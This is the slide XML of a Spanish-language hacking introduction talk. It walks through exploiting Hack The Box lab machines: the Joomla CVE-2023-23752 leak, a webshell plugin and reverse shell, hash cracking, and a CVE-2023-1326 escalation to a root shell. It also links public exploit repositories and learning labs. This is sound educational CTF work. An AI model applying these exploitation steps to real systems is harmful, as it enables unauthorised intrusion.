              <a:t>Crafty</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0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F77CBA5D-C3DA-518B-27EF-354C8829C3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="103"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Resolución de la máquina “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Crafty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>” en HTB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6D46B0C1-280A-6516-4341-354959B9DA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="104"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>09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F32FDBC4-DBA2-19BC-1FF5-F8D8686B2516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="105"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>0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9119BAEF-F639-D23B-59C9-8D657B09647F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FAFC5532-3CE4-00C1-ECCF-C37AB4E418EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="107"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>DevVortex</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES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DD0AA58A-CE7E-CE3B-EF70-01B5AD9EC279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9521296" y="4036057"/>
            <a:ext cx="4866564" cy="276022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Resolución de la máquina “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>DevVortex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>” en HTB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8C61AC4-3EDB-2DDF-9601-2AA6B49DBBDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="109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8FFC907F-7D2B-C0C1-1BD2-99A7E6F4BD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11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C3959AFF-797D-B829-D9E9-9FE6BEC9AEB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="119"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Herramientas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D6A32108-828C-D5CC-FD73-B997255CC71B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="120"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Herramientas comunes en un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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576F9BF-AB70-A48F-47B1-9671FEB290E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="121"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>08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C94E641A-C5BD-C0CB-E756-A971E6DF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285454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D7814-F105-FFCA-A6B4-9245350D0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B3599B3-5F99-7EEC-615E-F6FD7B109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/>
              <a:t>Joomla! ¿Podemos entrar?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BDA6344-60F3-FA68-8065-3773D9D21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68"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8823090" y="6238884"/>
            <a:ext cx="6089756" cy="1775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5A495E-F2D9-AB6C-6AAD-3626BDA41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83" y="1422400"/>
            <a:ext cx="7812417" cy="46211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2A40AB-AF0C-9E12-4C61-47B150C7C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28" y="2565250"/>
            <a:ext cx="7481489" cy="31116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E49D24F-0F92-3C5C-8A5D-74981D904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22" y="6350277"/>
            <a:ext cx="7172891" cy="10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FC9CB-5062-2B7A-0BBA-8DCB18C64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05E928-8F2D-CDF9-9B02-3276ED25A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/>
              <a:t>CVE-2023-23752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623188D-C3A7-F0B8-DF50-8F0F5100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0" y="7152362"/>
            <a:ext cx="9467850" cy="15430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75F36FD-9419-8554-70DF-7C28CC4F7D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9474419" y="4608688"/>
            <a:ext cx="645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https://www.exploit-db.com/exploits/51334</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://nvd.nist.gov/vuln/detail/CVE-2023-23752</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>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0F4D16-F178-4C28-D840-42C78E1BD4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405"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9271219" y="1572230"/>
            <a:ext cx="6796366" cy="25320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51340A-E8AB-58AE-0C34-6B4BC8F36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80" y="1240997"/>
            <a:ext cx="8534839" cy="56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0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711CD-1B27-D7C1-258B-495D8A517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33BC035-246E-8B46-5F96-D3979500A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/>
              <a:t>Somos “Lewis”, ¿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/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924E07-1422-9F1D-9467-3626B625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00" b="53627"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="5391149"/>
            <a:ext cx="6108700" cy="26102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1D700D-0EB1-3AA5-1E59-6D6F2ACA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494121"/>
            <a:ext cx="7334627" cy="29020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E4B366-D751-9134-7FED-F22916D3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75" y="1345766"/>
            <a:ext cx="9392026" cy="391823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DC20475-F1F0-BC95-5866-3ABDA0F3FB2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921126" y="8573332"/>
            <a:ext cx="786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5"/>
              </a:rPr>
              <a:t>https://github.com/p0dalirius/Joomla-webshell-plugin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8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6956F-EB14-1625-8F12-0D58565FC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30C80E-4B4F-2A9F-EDDD-61CE74622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 err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>reverseshell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9D089D6-3AA1-1877-A1ED-4ACE3E2B9070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921126" y="8573332"/>
            <a:ext cx="786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https://github.com/p0dalirius/Joomla-webshell-plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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41E351-B999-BBCE-E415-975B61E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87" y="1315804"/>
            <a:ext cx="13450141" cy="31164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2B6E9D-318E-84CE-3584-E715B1225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08"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4711701"/>
            <a:ext cx="6326364" cy="3116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2F5A6CC-493E-C267-390D-E6102C906135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10062660" y="5713183"/>
            <a:ext cx="513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Shell muy limitada … ¿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>upgradeamos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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2316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6956F-EB14-1625-8F12-0D58565FC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30C80E-4B4F-2A9F-EDDD-61CE74622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 err="1"/>
              <a:t>Upgradeando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>shell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B04CDE-A5EC-4573-031F-1DF7C3CD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2093325"/>
            <a:ext cx="9220200" cy="57340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A9334F-19F4-7E95-DC71-29F7F83026D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921126" y="1373653"/>
            <a:ext cx="907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¿Python? ¿Ruby? ¿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>Go</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>? ¿Qué tenemos?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291D91-DD49-CAC1-809D-C80CBE01BD2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368300" y="8388666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https://ironhackers.es/herramientas/reverse-shell-cheat-sheet/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119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5B912-8389-2F4C-6B2A-DDD55F26F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B9376E1-23F0-FEE7-CDA8-C417F70EE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1399535"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Accediendo a la base de datos con “Lewis”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55B69A-72AB-15A0-3036-293D518A6713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9474199" y="3133971"/>
            <a:ext cx="5575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Lewis no es usuario del sistema, no tiene directorio …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se buscan archivos, servicios, versión del SO, …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A6C55B-9E04-8B18-5C04-E08E99DD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18" y="1890300"/>
            <a:ext cx="7721601" cy="17867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E7264A5-9DC5-7898-87BF-4035675F0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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10706429" y="1351646"/>
            <a:ext cx="4495581" cy="16748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02D10C9-3B4D-3B23-77BC-89FF2F510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18" y="3852470"/>
            <a:ext cx="4352925" cy="32289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B00C639-B451-2F6F-CC01-99C55ED4D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48" y="4718734"/>
            <a:ext cx="9569561" cy="35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4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B97D-D8CE-099D-BF75-1A6D74E6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584854B-829B-18C7-E3DE-F67053174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/>
              <a:t>Crackeando el hash de Logan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0D911F-4C36-B5D5-B7C2-F9055FFC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1821453"/>
            <a:ext cx="8763121" cy="2857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A1C352-AA4B-77AD-35CF-9DFD1B76A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9" y="5384800"/>
            <a:ext cx="12573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3330-44A5-786A-834A-A42B03A0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AFA7F5-EF42-1812-27E2-DE14BE1B1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/>
              <a:t>Accediendo como “Logan”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94A1B0-8CA2-A28F-6010-0E3C45D7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1378497"/>
            <a:ext cx="5681663" cy="17457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55C54F-C4F5-DFFF-D222-8BD995F8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3225976"/>
            <a:ext cx="11536363" cy="15683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A81743F-C8A7-E58E-C1B5-027B93BB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" y="4896023"/>
            <a:ext cx="6598336" cy="7735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ECE11A6-A42D-C023-BCF5-FF6016212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31" y="5771338"/>
            <a:ext cx="8052169" cy="319236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B2F60-97C6-2F27-2F56-BB4FFDED4398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9893300" y="5943600"/>
            <a:ext cx="561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6"/>
              </a:rPr>
              <a:t>https://github.com/diego-tella/CVE-2023-1326-PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://diegojoelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/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601063B-629D-5060-E3C3-BE968BB75124}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7835899" y="1510280"/>
            <a:ext cx="557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 nuevo, tenemos que buscar:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se buscan archivos, servicios, versión del SO, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203728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A0A5-AB4A-7698-4C2B-2341F814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99CBF78-F3B2-CE0B-0400-6AE8CDACE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/>
              <a:t>Explotando CVE-2023-1326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99CFD12-EC85-AE6D-1226-E68A27570A64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8475062"/>
            <a:ext cx="106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https://github.com/diego-tella/CVE-2023-1326-PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://diegojoelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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5515F1-AC37-19FE-77DA-7C4119C46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24" y="2643187"/>
            <a:ext cx="6296025" cy="38576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2F4E0A-A210-E6D5-3912-45D87810B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1" y="1299679"/>
            <a:ext cx="7619999" cy="67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2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E291D-0331-3170-21C0-CFD02830B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55830B0-7374-5B07-B88D-3C8CB1EC4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408608"/>
            <a:ext cx="12407901" cy="707038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Explotando CVE-2023-1326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718472-2494-160E-EB17-8952AC11D237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8475062"/>
            <a:ext cx="106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https://github.com/diego-tella/CVE-2023-1326-PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://diegojoelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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42C6A7-29E9-FE23-1A5D-215D80511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974" y="3081337"/>
            <a:ext cx="7367395" cy="46275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86F541-4C02-490A-EBB0-DF5A2A667160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977900" y="1708393"/>
            <a:ext cx="1107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Cuando nos permita escribir, escribimos “!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>” y obtenemos una Shell como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>root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2918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0E5C2274-62B6-C4BD-26EB-8AB11D59D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Cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Teams</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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21E70CF8-E5FD-B931-13A3-F5CF06D49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3968" r="9383" b="3739"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2260600" y="2006600"/>
            <a:ext cx="107442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66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72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0AFF8C5-B591-E5AB-BCCA-51DFFF0E5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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3443621" y="1066800"/>
            <a:ext cx="8875379" cy="80057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6C4590F-F3F2-4B08-193D-B968BB3B7ABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8703228"/>
            <a:ext cx="887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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://evalian.co.uk/penetration-testing-vs-red-team-testing/</a:t>
            </a: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E64FD433-9078-6ADF-D183-F0DAC7A9E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99" y="359762"/>
            <a:ext cx="12407901" cy="707038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> vs Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Diagrama, Escala de tiempo&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186F95E6-22EA-BCC4-D733-D8182591E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9" y="1066800"/>
            <a:ext cx="10591749" cy="73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20D3-6390-987E-97AD-E25FD84AC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C4CA4094-EC1C-86FD-ECA6-231932034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673793"/>
            <a:ext cx="12407901" cy="707038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Fases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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1E4D189F-5610-CB78-E3D7-74039E231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49" y="1637306"/>
            <a:ext cx="11518901" cy="64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8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19C582-176E-2546-769B-0966C588E47C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E71EEEA-2B4C-2B6D-AC1C-0714C58E5E6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r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Google y Twitter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9A636CA-0C36-556A-62E6-3E59978DDCB4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9521296" y="5989707"/>
            <a:ext cx="4866564" cy="1330607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Rat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> / Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Jhaddix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> / Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>NahamSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> / Twitter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BD4AC41-8DD3-FD4F-66BF-3B427984943D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430EE5A-3E56-B8CE-C0AB-73D9D65A8854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r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Reports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/Blogs/Posts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D2BEF72C-6A21-A99D-A7FB-8C6BD9F7311D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1841500" y="5989707"/>
            <a:ext cx="4866564" cy="1814329"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Hackerone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>reports</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.hackplayers.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://medium.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://pentester.land/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> 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1877677-00FD-FB47-4CBC-4DD65BBD36FA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1586D16B-5A70-6CAB-55D0-7ADC909BD354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s-ES" dirty="0"/>
              <a:t>YouTube/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Twitch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541DC49-790F-ED8A-D1C2-69D53E5C4C67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1841499" y="2752295"/>
            <a:ext cx="5820305" cy="2210911"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>@S4vitar / Marcelo Vázquez</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>@ContandoBits / Kike Garcia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>@soy-elmago / Alan Levy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>@_JohnHammond / John </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Hammond</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-E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86E34E0-4CDF-4133-62F5-CCC89F625F97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69F06E64-613D-4728-1463-FA7024FFEF48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="107"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Laboratorios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50D9F2F-F30C-3800-409F-2449DBF56CFF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>
          <a:xfrm>
            <a:off x="9521296" y="2752295"/>
            <a:ext cx="6583062" cy="2208283"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://portswigger.net/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.hackthebox.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://tryhackme.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.hackerone.com/hackers/hacker101</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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BEE81D-5262-E4A3-8AE4-C4400CBE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empezar en el Hacking?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21855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20D3-6390-987E-97AD-E25FD84AC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C4CA4094-EC1C-86FD-ECA6-231932034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299" y="673793"/>
            <a:ext cx="12407901" cy="707038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139B30-00AE-2B1E-5849-35FC1D9A1040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
